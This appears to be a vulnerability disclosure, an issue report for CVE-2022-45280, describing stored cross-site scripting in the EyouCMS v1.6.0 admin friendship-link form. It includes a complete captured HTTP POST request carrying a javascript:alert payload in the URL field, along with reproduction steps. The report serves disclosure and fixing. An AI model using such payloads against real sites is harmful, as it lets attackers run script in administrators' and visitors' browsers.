Headline
CVE-2022-45280: EyouCMS v1.6.0 existence stored cross-site scripting (XSS) · Issue #32 · weng-xianhu/eyoucms
A cross-site scripting (XSS) vulnerability in the Url parameter in /login.php of EyouCMS v1.6.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
name:EyouCMS
version: EyouCMS-V1.6.0-UTF8-SP1
Installation package download:
Problematic packets:
POST /login.php?m=admin&c=Links&a=add&_ajax=1&lang=cn HTTP/1.1
Host: 192.168.23.130:49160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 141
Origin: http://192.168.23.130:49160
Connection: close
Referer: http://192.168.23.130:49160/login.php?m=admin&c=Links&a=add&lang=cn
Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=seo%7CSeo; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D5%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; referurl=http%3A%2F%2F192.168.23.130%3A49160%2F; img_id_upload=; ENV_IS_UPHTML=0; imgname_id_upload=typeid=1&groupid=1&url=javascript%3Aalert(123)&title=XS&logo_local=&logo_remote=&province_id=0&city_id=&area_id=&sort_order=100&email=&intro=
Vulnerability recurrence
1.Log in to the background,Click “SEO module” ->"friendship link" ->"add link"
2.input payload:javascript:alert(11),Submit
Click and trigger XSS after submission
PS:The vulnerability will also be displayed on the home page and can be triggered by clicking